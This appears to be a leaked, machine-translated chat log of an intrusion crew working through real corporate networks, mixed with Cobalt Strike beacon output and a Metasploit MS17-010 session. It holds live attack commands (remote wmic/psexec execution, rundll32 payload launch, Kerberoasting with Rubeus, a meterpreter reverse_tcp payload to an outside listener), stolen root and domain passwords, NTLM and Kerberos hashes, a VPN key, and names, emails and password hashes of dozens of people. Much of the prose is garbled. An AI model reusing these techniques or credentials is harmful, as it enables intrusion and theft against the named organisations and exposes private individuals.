 Directory of C:\ProgramData

09/28/2020 01:22 PM <DIR> Applications
10/05/2020 11:48 AM <DIR> Binary Fortress Software
10/02/2020 03:52 PM 25,604 cn-matches.txt
10/03/2020 04:18 PM 6,518 hostnames.txt
10/02/2020 03:37 PM 0 matches-share.txt
10/02/2020 05:37 PM 818,088,516 matches_sysvol.rar
09/23/2020 12:31 PM <DIR> Mozilla
10/07/2020 09:03 PM 482 output.txt
09/28/2020 02:11 PM <DIR> Package Cache
10/03/2020 04:18 PM 511 ping.bat
10/07/2020 07:01 PM <DIR> regid.1991-06.com.microsoft
10/03/2020 08:19 PM 18,878 result.txt
               7 File(s) 818,140,509 bytes
               5 Dir(s) 168,773,058,560 bytes free

``you say the time is ticking no tell me what exactly the error fucked up I do not see what you did where the command output that did not work nihiht worked what should check 1+1 where the ping in vmik does not work you ping works so fucking think I with saiglobal to dedic? yes i mean i did not understand ))))))[ ](https://mediaeveryone.com/group/saiglobal-com?msg=fGGWwcFkJjfFHdZuE) and then you did not say inside do ping so you already opened accessa`` ``
beacon> shell ping google.com > C:\ProgramData\output.txt
[*] Tasked beacon to run: ping google.com > C:\ProgramData\output.txt
[+] host called home, sent: 74 bytes
beacon> cd C:\ProgramData
[*] cd C:\ProgramData
[+] host called home, sent: 22 bytes
beacon> shell dir
[*] Tasked beacon to run: dir
[+] host called home, sent: 34 bytes
[+] received output:
 Volume in drive C has no label.
 Volume Serial Number is 4C8B-2027

 Directory of C:\ProgramData

09/28/2020 01:22 PM <DIR> Applications
10/05/2020 11:48 AM <DIR> Binary Fortress Software
10/02/2020 03:52 PM 25,604 cn-matches.txt
10/03/2020 04:18 PM 6,518 hostnames.txt
10/02/2020 03:37 PM 0 matches-share.txt
10/02/2020 05:37 PM 818,088,516 matches_sysvol.rar
09/23/2020 12:31 PM <DIR> Mozilla
10/07/2020 09:03 PM 482 output.txt
09/28/2020 02:11 PM <DIR> Package Cache
10/03/2020 04:18 PM 511 ping.bat
10/07/2020 07:01 PM <DIR> regid.1991-06.com.microsoft
10/03/2020 08:19 PM 18,878 result.txt
               7 File(s) 818,140,509 bytes
               5 Dir(s) 168,773,152,768 bytes free


The output command worked right away, so I had to reboot and re-spawn it, it's been on hold for 19 hours, will it work on the deck?
beacon> shell wmic /node:10.225.10.200 process call create "ping google.com>C:\Windows\Temp\output.txt"
[*] Tasked beacon to run: wmic /node:10.225.10.200 process call create "ping google.com>C:\Windows\Temp\output.txt"
[+] host called home, sent: 120 bytes
[+] received output:
Executing (Win32_Process)->Create()

Method execution successful.

Out Parameters:
instance of __PARAMETERS
{
	ProcessId = 3660;
	ReturnValue = 0;
};

Tell me how to ping hosts from there) the clock is ticking here does not let go on you have a full hell, hashes, etc.otkrytay any other server datacenter.holocal what domain? the file on the machine no trying to google ping from there with the output in the filevneshku sees? what to do? threw at 10.225.10.200 dalku and ran, it came out:
```
beacon> shell wmic /node:10.225.10.200 process call create "rundll32 C:\Windows\Temp\x64.dll entryPoint"
[*] Tasked beacon to run: wmic /node:10.225.10.200 process call create "rundll32 C:\Windows\Temp\x64.dll entryPoint"
[+] host called home, sent: 121 bytes
[+] received output:
Executing (Win32_Process)->Create()

Method execution successful.

Out Parameters:
instance of __PARAMETERS
{
	ProcessId = 964;
	ReturnValue = 0;
};
```

The case worked and deleted, but no session, no process on the remote machine either[ ](https://mediaeveryone.com/group/saiglobal-com?msg=pAQcZLTgxornyJwtC) @user4+ is it me or why the message above?[ ](https://mediaeveryone.com/group/saiglobal-com?msg=AqTqJRs2DTrERaaWP) 1[ ](https://mediaeveryone.com/group/saiglobal-com?msg=GQEJAdZqC2XPm7pez) 2[ ](https://mediaeveryone.com/group/saiglobal-com?msg=go37ZE2uk9zwPiWgn) 1? is it whoSuccessfully pinged trusts
```
saig.frd.global [10.210.8.236]
datacenter.local [10.225.10.200]
frd.global [10.225.12.1]
saigProd.local [10.195.100.1]
c360.local [10.195.43.2]
legalco.local [10.195.23.1]
``Now I took off there where all the requirements are fulfilled, where are the ABs, sasses and other things found?
datcenter.local
c360.local
standard
legalco.local
frd.global

is that right?
```
192.169.6.100
u: root
p: DG8mZZyB
---
192.52.167.104
u: root
p: PeEDMf5q
```
``Friends, I have no power at all, I'm leaving for segonday, if you get to raise any other network in addition to the one that raised to the correct rights - and will have strength - get to the domain controller and put in a slip for 180 a couple of three server sessions would be good aha)aha, it would be good)))) aha
autopavnunu you give) drive machines in a bunch - where the rights fit - there will be removed lsaas and spit in the console, and I've already dreamed ... (or with each hand dump lsaasn each simply you do not need to create a session itself it only works for those machines where you have the admin Credits yes more here .... oh....... look at the screenshot it's probably pointless, because on the car yes he is not an admin or anything.
this isn't serious.
i am not a translator of the obvious articles all the same `[<domain>/]<user>[:<password>]@<target>> what is there to specify?)↪Psassy [--hashes [LM:]NT] --dumppath /share/path/to/dump.dmp [<domain>/]<user>[:<password>]@<target> what? what are you talking about?)That is, run without specifying credentials with a target on the car where sits YES? they just go to the availableNo, of course only I have local admins and where Yes sit they are not admins. This will work? Yeah, let me try) @user4 to your problem, by the way, fits perfectly this is someone who has a lot of cars with admin rights, but do not have the right userschtrss://securityonline.info/lsassy-extract-credentials-from-lsass-remotely/wait for the usual hoursoffshey apparentlyThere are no yes?
<?xml version="1.0" standalone="yes"?
<SW_Client_Policy version="9.0">
<Connections>
<Connection name="GroupVPN_C0EAEE4F8F220">
<Flags>
<UseDHCP>1</UseDHCP>
<TrafficRestrictions>2</TrafficRestrictions>
<SetAsDefaultRoute>0</SetAsDefaultRoute>
<CacheXauth>2</CacheXauth>
<WiFiSecEnforced>0</WiFiSecEnforced>
</Flags>
<PersonalFirewall>
<LANPrimaryIP>192.168.1.3</LANPrimaryIP>
</PersonalFirewall>
<Peer>
<HostName>111.93.129.174</HostName>
</Peer>
<Phase1Params>
<ExchangeType>4</ExchangeType>
<AuthenticationMethod>65001</AuthenticationMethod>
<PresharedKey>39464642424631363643424635374341</PresharedKey>
<DHGroupValue>1</DHGroupValue>
<EncryptionAlgorithm>5</EncryptionAlgorithm>
<EncryptAlgoKeyLen>0</EncryptAlgoKeyLen>
<HashAlgorithm>2</HashAlgorithm>
<Lifetime>1:28800</Lifetime>
<IDType>2</IDType>
<IDData>47726F757056504E</IDData>
</Phase1Params>
<UserAuthentication>
<Expected>1</Expected>
</UserAuthentication>
<Phase2Params>
<ProtocolID>3</ProtocolID
<EncapsulationMode>1</EncapsulationMode>
<AHTransform>3:32</AHTransform>
<ESPTransform>3:2:0:0:32</ESPTransform>
<Lifetime>1:3600</Lifetime>
<DHGroupValue>0</DHGroupValue>
<DestinationNetwork>192.168.1.3:255.255.255.255</DestinationNetwork>
</Phase2Params>
</Connection>
</Connections>
</SW_Client_Policy>

``gvcauto.log that's why I asked in WHICH TERMINAL and for the Windows lnkinfo I do not know I thought you were checking on his PC in the terminal asked because $ - not cmd You have not checked the holes at all?In your computer through lnkinfo*.rcf in what terminal? In the terminal, ~/Desktop/New_New/lnk$ lnkinfo "Connection to 106.51.226.49.lnk" command? With your hands, what did you do?
	Description : Connection to 111.93.129.174
	Relative path : ..\..\..\Program Files\SonicWall\Global VPN Client\SWGVC.exe
	Working directory : C:\Program Files\SonicWall\Global VPN Client
	Command line arguments : /E "111.93.129.174"

```
```
	Description : Connection to 106.51.226.49
	Relative path : ..\...\...\Program Files\SonicWall\Global VPN Client\SWGVC.exe
	Working directory : C:\Program Files\SonicWall\Global VPN Client
	Command line arguments : /E "106.51.226.49"


``Thank you''.
28b3c260711a284559121c3986ca93b65df28706a43fe7a2234a0fdf79904268 2039005F
20733646ed4d68a7243b06d6c2f81c64a60ea0a5e309219595d1493a9b59d1c5 382A0473
e51ae5f54a13577b4eedab3d4c2836b644757c7c99b9d865aa39918079d7844c 51692370
a38df217726c7869140d147ae1c06c3b3ae3dd9f513872614dcbdbb9fc80822e AF2319AB
a10e69c47b04ee897a784f8c55cc222c26d034dbfc622826586e31f429848383 9569F458
06dee60f4c72a87a1a86e3ffca40c5906a83f9cf1394b27e6d7b13d3d034da4a 564273C6
42ca67a00c3692ccdf792e01e3bd25a5a66ddcce5ff6bc4314e804cc6e22d12c 1D849510
03ac674216f3e15c761ee1a5e255f067953623c8b388b4459e13f978d7c846f4 1234
a6b2ff167350bc4e65ce22f5d41a31cf5db73d5228d377b254a77f2df5967be7 CBCB9373
fe03e51728e1515d9bd9182cedcdd6cb897cd4829e48cf2cacf3d83cda4d2ab1 127010CA
fd5ad27c0a5c5e8046ba867ac37b42c72ca9366783b6129940e8deca384fb945 FFC77685
2cb025bc62d110e7beec6c45fbfe795352c4194b751e1a6e18df3c47a0cd79f7 BACBC590
c5e9cbd9bb4223ce7750d64000e82c0fc8664a666feba9fdbd994a9530c4d6c8 D4FF4357
9dc9c5a3aafdd7856a724723a9a92672a5c86165f360c634658d76f428550b6e CDDAC102
``@tl1 hashes can you check?

User Id User Password Email Id Middle Name Last Name First Name
HP20196201010102538109914HP 8eb99a99dde701da48e6150d801ad8c489e0de5599a11fd7e7bd18ebc32a64a9 harjeetroadlines95+11@gmail.com Singh Vinod
HP20196201010142798572023HP 0293fbd8830316737c35ec729612de73c204e35d14c8d627169ec4e2a2e3af9a harjeetroadlines95+12@gmail.com Shinde Suresh
HP2019620101016624821422HP fa2add98c1722c776b4e85a66c88fdf49a5c395ba64471fb0011d2ab1c7897b1 harjeetroadlines95+45@gmail.com Singh Daljeet
HP20196201010184360973695HP 28b3c260711a284559121c3986ca93b65df28706a43fe7a2234a0fdf79904268 harjeetroadlines95+15@gmail.com singh Tulsi
HP201962901010225863663965HP 20733646ed4d68a7243b06d6c2f81c64a60ea0a5e309219595d1493a9b59d1c5 harjeetroadlines95+48@gmail.com bhaurao Shelke Manik
HP20196201010269661194147HP 6bbfa3023e958dd30762b74abc3be2d37011b9471c4c6848550b4c268cabaa9f harjeetroadlines95+53@gmail.com Shoib Mohd
HP201962901010312857813028HP de5d3c3ab9122d51c37a0dab08ba1a96d8e276b44a4888b837a3326e5a7d1fb0 harjeetroadlines95+19@gmail.com Kumar yadav Ajay
HP201962901010355940386359HP 0724211d5b4f0a3885a48eb47c8bf69857878f6582127f76f517daa083046f2d1f harjeetroadlines95+29@gmail.com Prasad yadav Bhola
HP20196201010396384455535HP e51ae5f54a13577b4eedab3d4c2836b644757c7c99b9d865aa39918079d7844c harjeetroadlines95+24@gmail.com Yadav Santosh
HP2019620101059773261151HP 64a4837d5761bb401f089c999cde3ec2316195f46e602d30c0089a2644d34c09 harjeetroadlines95+5@gmail.com Pandey Sanjay
HP2019620106501991951580HP 18b0b6265c6965aea7d75fa147094d89cbedac2153540cbd1e7ffa829cf28000 harjeetroadlines95+14@gmail.com Ali Farman
HP20196290106543854136534HP a38df217726c7869140d147ae1c06c3b3ae3dd9f513872614dcbdbb9fc80822e harjeetroadlines95+52@gmail.com Kumar yadav Manoj
HP2019620106583623832858HP a10e69c47b04ee897a784f8c55cc222c26d034dbfc622826586e31f429848383 harjeetroadlines95+44@gmail.com Ahmed Mustaq
HP2019620107126389961096HP 4d081a605ec6f5c420b4f0498efccd6af3880b3b4abbeb700eca35d5a14cffb6 harjeetroadlines95+32@gmail.com singh Amritpal
HP2019620107166277311185HP 06dee60f4c72a87a1a86e3ffca40c5906a83f9cf1394b27e6d7b13d3d034da4a harjeetroadlines95+36@gmail.com Sharma Surendra
HP2019620107208559417976HP 42ca67a00c3692ccdf792e01e3bd25a5a66ddcce5ff6bc4314e804cc6e22d12c harjeetroadlines95+49@gmail.com Singh Paramjit
HP2019620107248623258019HP 9b3957be4c45929c47d7cf447105a2488460da7044b147aa715f2c3dd55f32f4 harjeetroadlines95+43@gmail.com Khan Sohel
HP201962010726835843708HP 03ac674216f3e15c761ee1a5e255f067953623c8b388b4459e13f978d7c846f4 harjeetroadlines95+38@gmail.com Yadav Chandrajeet
HP2019620107291687742668HP 564b77746834fac1a3fbd08bb75c5ca418ae22c32ec6fd99697e2c9de5beee17 harjeetroadlines95+22@gmail.com Kuddus Abdul
HP2019620107332167491575HP 8acc6699e1efd4e2d089011a45e55c7f17fd09c34e89a9a4c5259aa1ed218b31 harjeetroadlines95+23@gmail.com singh Raviraj
HP2019620107374005617063HP ef9505d24415cc7f19baef0bbf47f39e9f5e69f26fb82ee2769af3ec020f2f36 harjeetroadlines95+51@gmail.com Saroj Lalji
HP2019620107418163901165HP 43f079f13bbc55a963b810e7f6a101c6e234634dccd27898d4be234b94fc0351 harjeetroadlines95+40@gmail.com Yadav Bhuneshwar
HP201962010745425411913HP b1448c1fe3d2d0252198101ac75580a38cd24296453736f2698800ce8291a9a7 harjeetroadlines95+9@gmail.com kumar Sushil
HP2019620107459870763681HP a6b2ff167350bc4e65ce22f5d41a31cf5db73d5228d377b254a77f2df5967be7 harjeetroadlines95+20@gmail.com Singh Sukhdev
HP2019620107508772408904HP 39f504edb611f64f85ac2fedda7965a966df33c21a0764b70d122b69bc10a1ef harjeetroadlines95+1@gmail.com Faisal Mohd
HP2019629010755579004247HP e4b4c3e134a9e29c2ec3b483f4b5388a742165d49b9fa6896ca09ae5f4742665 harjeetroadlines95+7@gmail.com S Yadav Ramraj
HP2019620107594925018904HP c16fe0b02048b17c3193c17e5c3418dbb1341b5d15b73a90c7111dc960b6dea3 harjeetroadlines95+33@gmail.com singh Navkarandeep
HP201962010787333855982HP fe03e51728e1515d9bd9182cedcdd6cb897cd4829e48cf2cacf3d83cda4d2ab1 harjeetroadlines95+21@gmail.com Kumar Akhilesh
HP201962010816555033866HP edb5656900c6b3e667de00038bda04127868ee861f2b5225afadb6960b69cc50 harjeetroadlines95+6@gmail.com Kumar Pradeep
HP2019620108202746958327HP 26c2e1daf8a8174bc999e72b1b9c92c3477977884bad3f889735e4e45a324dda harjeetroadlines95+26@gmail.com Yadav Vinod
HP2019620108263742055697HP 58895edc24dbf57a57518af35ebb42c33dffe8cc94bb8851c962a55e5a960aad harjeetroadlines95+46@gmail.com Yadav Rambrij
HP2019620108304916009069HP caf7d1996d96a5ce4f25cf82250d2d2825785a295d0ca05106f055d20392c9e7 harjeetroadlines95+13@gmail.com Yadav Yogendra
HP2019620108346644272108HP e844104206d88758840a8f77e6dcc0f9b917e1b3d3e11655297c6340ce2f3734 harjeetroadlines95+3@gmail.com Yadav Ramdaras
HP201962010836190078047HP 025750f879fba28d4d251ce0f2d023a17f4114d2e9e4f1e64e401e71559b414d harjeetroadlines95+54@gmail.com singh Vinod
HP2019620108387071096273HP 419e4e274b748c7a247c6e0edbccc7e2d04244c915f2f73fe8509b31cecb29e7 harjeetroadlines95+47@gmail.com Khan Salman
HP20196290108428759387650HP 817953730feb1dddc4aeff1098b1ca4781ca8e654565656872be24f3f904589003 harjeetroadlines95+27@gmail.com kumar tiwari Abhimanyu
HP2019620108472108246672HP 4cc427c04edca8e7ff1b9c8301842d5f0b1d1cd40e99d95cdf036beafac0e7e1 harjeetroadlines95+8@gmail.com mishra Kripashankar
HP2019620108511300311348HP 187db3e24a345628fbd7f897a1e76a55ab5e22c01561d52b239f840e67bd59fb harjeetroadlines95+41@gmail.com Singh Mangal
HP20196290108554546177564HP fd5ad27c0a5c5e8046ba867ac37b42c72ca9366783b6129940e8deca384fb945 9881318592@abcxyz.iin Kumar singh Suresh
HP2019620108595175932621HP 2cb025bc62d110e7beec6c45fbfe795352c4194b751e1a6e18df3c47a0cd79f7 harjeetroadlines95+35@gmail.com Singh Gurbinder
HP201962010877746921752HP 753d8a9ccd60617d73ff1c2b945ee1374e80fd3e9bbc8485c020a3ae46c792f8 harjeetroadlines95+10@gmail.com Pandey Kuldeep
HP2019620109127897736262HP fdb9c838fd85f213933cb7342d6d21d7508dbf31b9ca8ad1c00b672c04fa87e8 harjeetroadlines95+39@gmail.com Asare Ram
HP20196290109217794143490HP 0f91dbf8da8988f7f79476e17eb87b294c086142f6a452fa2332285e3c40e402 harjeetroadlines95+31@gmail.com kumar saroj Harihar
HP2019620109261508147074HP 15c4e7a3d2c1e7983a9ff4f59d6a701b965f1d0ad11038c7a4b8a44e9f48a34e harjeetroadlines95+34@gmail.com saroj Rammurat
HP2019620109303478651104HP f44f1c235edd95e7f958fd3b6bcdb41a04daecfe3f99d9499187a9d9d5fe2876 harjeetroadlines95+2@gmail.com yadav Chotelal
HP201962010938554818780HP c5e9cbd9bb4223ce7750d64000e82c0fc8664a666feba9fdbd994a9530c4d6c8 harjeetroadlines95+30@gmail.com Singh Ravendra
HP2019620109397620666116HP 4c5041f14fbe628c79c03a4f302afcfee51d7ee7daec50747b9b619fb1211f27 harjeetroadlines95+17@gmail.com Sahani Jitendra
HP201962010944646843344HP 5ba88e4137d7233d3c42e36b7f9dcca9138504343f89324641d286ba52ffbf80 harjeetroadlines95+4@gmail.com Yadav ShivPrasad
HP2019620109488162287045HP 9dc9c5a3aafdd7856a724723a9a92672a5c86165f360c634658d76f428550b6e harjeetroadlines95+50@gmail.com Singh DALJEET
HP20196290109529879135556HP 54d6154b9ef93bb6ac2e7db3359132dce130de7a081a19a4ea0dd5cff898ae harjeetroadlines95+18@gmail.com pratap yadav Mahendra
HP20196290109573398884992HP c28de86389b6ebc8e646d13602d153b2ffdad50e69a69c69e6376e10c0c6dab7 harjeetroadlines95+37@gmail.com Kumar singh Raj
HP201962010987142216555HP 769c174ad96ac9a01348043f932c22cbde1a65c934354b273db481b329864722 harjeetroadlines95+25@gmail.com Sankar Sankar
``````
[-] Could not open service control manager on \192.168.1.169: 1722
``What do you mean by 1722``?
 Am connecting services.msc to another computer from my machine and got ... AM (From:Configuration Manager Software Updates Management).
``````
beacon> remote-exec psexec \\192.168.1.169 process list
[*] Tasked beacon to run 'process list' on \192.168.1.169 via Service Control Manager
[-] Could not open service control manager on \192.168.1.169: 1722
[+] host called home, sent: 1777 bytes
``````
user 2-2[ABINASHP]abinash.pattnayak/5776|2020Oct07 19:52:33> remote-exec psexec \\192.168.9.42 ipconfig /flushdns
[*] Tasked beacon to run 'ipconfig /flushdns' on \192.168.9.42 via Service Control Manager
[-] Could not open service control manager on \192.168.9.42: 5
[+] host called home, sent: 2011 bytes
[-] Could not open service control manager on \192.168.9.42: 5
``psexec_command then
beacon> run wmic /node:192.168.1.169 process list brief
[*] Tasked beacon to run: wmic /node:192.168.1.169 process list brief
[+] host called home, sent: 61 bytes
[+] received output:
Node - 192.168.1.169

ERROR:

Description = The RPC server is unavailable.





``Or architecture, ask for a list of processes...''?
beacon> run dir \\192.168.9.169\ADMIN$
[*] Tasked beacon to run: dir \\192.168.9.169\ADMIN$
[+] host called home, sent: 44 bytes
[-] could not spawn dir \\192.168.9.169\ADMIN$: 2
``Try the other two at once ``ADMIN$`` is it the same? ``Could not spawn``?
beacon> run dir \192.168.9.42.42\C$
[*] Tasked beacon to run: dir \192.168.9.42C$
[+] host called home, sent: 39 bytes
[-] could not spawn dir \192.168.9.42C$: 2]
How about just ``dir \\192.168.9.42.42\C$``?
beacon> run whoami
[*] Tasked beacon to run: whoami
[+] host called home, sent: 24 bytes
[+] received output:
ad\abinash.pattnayak

```shell whoami?``
beacon> run net use * \\192.168.9.42.42\C$ /persistent:no
[*] Tasked beacon to run: net use * \\192.168.9.42\C$ /persistent:no
[+] host called home, sent: 60 bytes
[+] received output:
The password is invalid for \\192.168.9.42C$.
```

```
beacon> run net use * \\192.168.9.169\C$ /persistent:no
[*] Tasked beacon to run: net use * \\192.168.9.169\C$ /persistent:no
[+] host called home, sent: 61 bytes
[+] received output:
The password is invalid for \\192.168.9.169\C$.

Enter the user name for '192.168.9.169':

``[ ](https://mediaeveryone.com/group/happay-in?msg=pkt4xfiMymwKJftue) why don't you send a keb just in caseI can't connect to these machines
user 2-2[ABINASHP]SYSTEM */23308|2020Oct07 19:13:04> shell net group "Domain Admins" /dom
[*] Tasked beacon to run: net group "Domain Admins" /dom
[+] host called home, sent: 61 bytes
[+] received output:
The request will be processed at a domain controller for domain ad.happay.in.

Group name Domain Admins
Comment Designated administrators of the domain

Members

-------------------------------------------------------------------------------
abhinav.bhaskar Administrator anshul
chandan koushik.s mohit.goel
nitin.choudhary pritam sudhir
varun vivek.kumar
The command completed successfully.

``Mmmmmm''.

beacon> net share \\192.168.9.169
[*] Tasked beacon to run net share on 192.168.9.169
[+] host called home, sent: 104505 bytes
[+] received output:
Shares at \192.168.9.169:

 Share name Comment
 ---------- -------

[+] received output:
 ADMIN$ Remote Admin
 C$ Default share
 HP OfficeJet Pro 8710 PCL-3 HP OfficeJet Pro 8710 PCL-3
 IPC$ Remote IPC
 print$ Printer Drivers
```
```
beacon> net share \\192.168.9.42
[*] Tasked beacon to run net share on 192.168.9.42
[+] host called home, sent: 104505 bytes
[+] received output:
Shares at \192.168.9.42:

 Share name Comment
 ---------- -------

[+] received output:
 ADMIN$ Remote Admin
 C$ Default share
 IPC$ Remote IPC

```
```
beacon> net share \\192.168.1.185
[*] Tasked beacon to run net share on 192.168.1.185
[+] host called home, sent: 104505 bytes
[+] received output:
Shares at \192.168.1.185:

 Share name Comment
 ---------- -------

[+] received output:
 ADMIN$ Remote Admin
 C$ Default share
 IPC$ Remote IPC

``````
user 2-2[ABINASHP]SYSTEM */23308|2020Oct07 19:09:59> execute-assembly Rubeus.exe kerberoast /format:hashcat /outfile:C:\ProgramData\Rubeus_hashes_full.txt
[*] Tasked beacon to run .NET program: Rubeus.exe kerberoast /format:hashcat /outfile:C:\ProgramData\Rubeus_hashes_full.txt
[+] host called home, sent: 320189 bytes
[+] received output:

   ______ _
  (_____ \ | |
   _____) )_ _| |__ _____ _ _ ___
  | __ /| | | | _ \| ___ | | | |/___)
  | | \ \| |_| | |_) ) ____| |_| |___ |
  |_| |_|____/|____/|_____)____/(___/

  v1.5.0


[*] Action: Kerberoasting

[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.

[*] Searching the current domain for Kerberoastable users

[+] host called home, sent: 64 bytes
[+] received output:

[*] Total kerberoastable users : 1


[*] SamAccountName : sudhir
[*] DistinguishedName : CN=Sudhir Kumar. Thapa,OU=IT-Team,OU=Users,OU=HAPPAY,DC=ad,DC=happay,DC=in
[*] ServicePrincipalName : AgpmServer/HAPPAYADSERVER.ad.happay.in/ad.happay.in
[*] PwdLastSet : 25-09-2020 12:45:35
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash written to C:\ProgramData\Rubeus_hashes_full.txt

[*] Roasted hashes written to : C:\ProgramData\Rubeus_hashes_full.txt

``Manually check a lot of pc's then runNo luck with anything else? @tl1 can you run shuffleboarder?
User Password Email Id
Happay@81 isha_wattle@geojit.com
Happay@82 jasdeep_k@geojit.com
Happay@83 karmjeet_kaur@geojit.com
Happay@84 rohit_kumar@geojit.com
Happay@85 sumit_sharma@geojit.com
Happay@86 sunil_chhabra@geojit.com
Happay@87 joga_singh@geojit.com
Happay@88 kimat_r@geojit.com
Happay@89 om_parkash@geojit.com
Happay@90 puneet_p@geojit.com
Happay@91 shashank_jain@geojit.com
Happay@92 vishesh_k@geojit.com

``````
Happy@26265
Gopal@26265
Abinash@26265
````ad.happay.in [192.168.1.12]````
 HAPPAYADSERVER 192.168.1.2
 HAPPAYADCSERVER 192.168.1.12
``please thank youuser7192.168.43.108user4''.
[+] 192.168.1.2:445 - 192.168.1.2:445 - Success: '.\abinash.pattnayak:aad3b435b51404eeaad3b435b51404ee:b4e99243a0b9c8fa481d2307a26cc933'
``Yeah, but it's not an admin account.
[+] 192.168.9.212:445 - 192.168.9.212:445 - Success: '.\Admin:aad3b435b51404eeaad3b435b51404ee:39a6957f6260484bd84efa7933501865'
[+] 192.168.9.169:445 - 192.168.9.169:445 - Success: '.\Admin:aad3b435b51404eeaad3b435b51404ee:39a6957f6260484bd84efa7933501865'
[+] 192.168.9.42:445 - 192.168.9.42:445 - Success: '.\Admin:aad3b435b51404eeaad3b435b51404ee:39a6957f6260484bd84efa7933501865'
[+] 192.168.1.185:445 - 192.168.1.185:445 - Success: '.\Admin:aad3b435b51404eeaad3b435b51404ee:39a6957f6260484bd84efa7933501865'
``1) test normally, I told you to update the AD
2) the VPN was turned off
C:\Users\user>ping -n 1 BI-SANDBOX.evo.local
Ping request could not find host BI-SANDBOX.evo.local. Please check the name and try again.

C:\Users\user>ping -n 1 CHEECH.evo.local

Pinging CHEECH.evo.local [172.17.70.16] with 32 bytes of data:
Reply from 172.17.70.16: bytes=32 time=66ms TTL=126

Ping statistics for 172.17.70.16:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 66ms, Maximum = 66ms, Average = 66ms.
``I will check nowPing request could not find host HQ-DC-2.evo.local. Please check the name and try again. Is it available? It's weird...Windows Server 2008 users? The machines I browse on might have fallen off the vpn
Ping request could not find host BI-SANDBOX.evo.local. Please check the name and try again.Yes, no, there are the crescendos, are they needed? Under the user without rights + is it? ps command I wait for the load itself I wonder how so? I have realtime prot turned on itself)) is available.com and the load immediately if okeya pinga only daidar command will do? and the load is on the dedication? hang on and under the session goes to azure I think he dumps ffv azure another type of goVo\bplehal
```
https://apps.sematext.com/ui/monitoring/19585/solrCloudOverviewReportPage
https://portal.azure.com/#@evo.com/resource/subscriptions/eaa8f156-823c-4beb-91bb-bd6703f0c0e6/resourceGroups/www-production/providers/microsoft.insights/components/evodotcom/overview
You can try it under the creeds.
http://evosolr.southcentralus.cloudapp.azure.com/solr/#/~cloud
``````
$krb5tgs$23$*Administrator$nordicaero.com$MSSQLSvc/naarns01.nordicaero.com:3782*$04B50EDE3FB15F6D525CC0B01CC5DD9E$604E8AB85DC9EB694BDD682B48C42E4F07CFA3AA30686122F8D09AFC20E51B61BF9A5EAB77034076C48474E468664476E4321E48D3FC1A69626CDCF006502A2705DDD7DE5466471BFAA95148C83E8965DEE3CC5D3D6220BEB541E0BFE100BCB073FB85B2039D2C37F76D43EC9D8587A170F7CB2E4DA970EAF1C395D8AE288D04A63AF9D8817964BDFDA633BB681A97839155EB7D73AEB83AC763034B14FCB9A0AD91B2CDD331B171E244953AA50624F5C795D03BCF6D2A71FDFF6965D596130BAEF165DA4B8209E2191975DE04179D7BA4EBCA8EA1673BB426A1F7F37C2D14E639CF14476A08947F1887B331AFD5B6D0E1772C0CAA7FE07ADABB5A9E86E81EC07FA4C1981D54AD29D202D856D3E9DB1659E1277A86DB72BF5F2A07A0A7785BE671181E9EFE99BC5880004395CDEBD7B329DE004F6B655244E8C19FF0F0B296F689E1FF755E6D97D3D87EDFD91F425656578708C6BA8F242A5E44CEB3856E242E850AA8CEC17A1E5CA8825BC08AC74AA07679569066A7C539CE24134514A71721AFF2147AF207A8E0134074943A1E2D94B22652F432E3F322D49D84BE0003A4570FC1F6830335AC5F1CB93D4146A63A7DDBD529F27AF435FB865823ABBF0E64BFFAEBE85D011E77DC45DE3994433AB3EA08F9FB0F3E4F7D6DE21AA9B1BFBB1F5DE45FFA485B3C07441D190F131

``Okv toad come offa in the input same cob was another session from this domain, someone worked it, no zakrepa ?this polozak only in this domaina in the trusts empty ? mb this is the case... mm-hmm((``
'nbtstat' is not recognized as an internal or external command,
operable program or batch file.
``nbtstat won't help, I could be wrong which shz I took from the portscan. And so, took the host us did a ping and by 24th to 445 and them in the scan. It turns out that in theory it could be from another domain.Then the hostname you already know if it's taken from the ad_comp current ee stop do not understand does not return hostOne from the current domain taken from the ad_com.Only within one domainacrossdomain authorization so will not work about the host which we attack1 min + it is sure from this domain?
msf6 exploit(windows/smb/ms17_010_psexec) > options

Module options (exploit/windows/smb/ms17_010_psexec):

   Name Current Setting Required Description
   ---- --------------- -------- -----------
   DBGTRACE false yes Show extra debug trace info
   LEAKATTEMPTS 99 yes How many times to try to leak transaction
   NAMEDPIPE no A named pipe that can be connected to (leave blank for auto)
   NAMED_PIPES /opt/metasploit-framework/embedded/framework/data/wordlists/named_pipes.txt yes List of named pipes to check
   RHOSTS 10.7.0.73 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT 445 yes The Target port (TCP)
   SERVICE_DESCRIPTION no service description to be used on target for pretty listing
   SERVICE_DISPLAY_NAME no The service display name
   SERVICE_NAME no The service name
   SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain CORP.TELEVISA.COM.MX no The Windows domain to use for authentication
   SMBPass R8WTksIOle1rP8)P no The password for the specified username
   SMBUser Hgutierreze no The username to authenticate as


Payload options (windows/meterpreter/reverse_tcp):

   Name Current Setting Required Description
   ---- --------------- -------- -----------
   EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
   LHOST 23.106.160.50 yes The listen address (an interface may be specified)
   LPORT 4444 yes The listen port


Exploit target:

   Id Name
   -- ----
   0 Automatic


msf6 exploit(windows/smb/ms17_010_psexec) > run

[*] Started reverse TCP handler on 23.106.160.50:4444
[*] 10.7.0.73:445 - Authenticating to 10.7.0.73 as user 'Hgutierreze'...
[-] 10.7.0.73:445 - Rex::Proto::SMB::Exceptions::LoginError: Login Failed: The server responded with error: STATUS_TRUSTED_RELATIONSHIP_FAILURE (Command=115 WordCount=0)
[*] Exploit completed, but no session was created.
msf6 exploit(windows/smb/ms17_010_psexec) >

``A couple of minutemen valid domains likeKlarens?
[-] 10.7.0.73:445 - Unable to find accessible named pipe!

``Domain creeds any added creeds in the options?
msf6 exploit(windows/smb/ms17_010_psexec) > run

[*] Started reverse TCP handler on 23.106.160.50:4444
[*] 10.7.0.73:445 - Target OS: Windows Server 2008 R2 Enterprise 7600
[-] 10.7.0.73:445 - Unable to find accessible named pipe!
[*] Exploit completed, but no session was created.

You know how to do it... I think you've already done it... can you do it? And you can score through the pajpkaroch see
can you run stageless pailoat not work how? no session? or error? all checked not work) yes
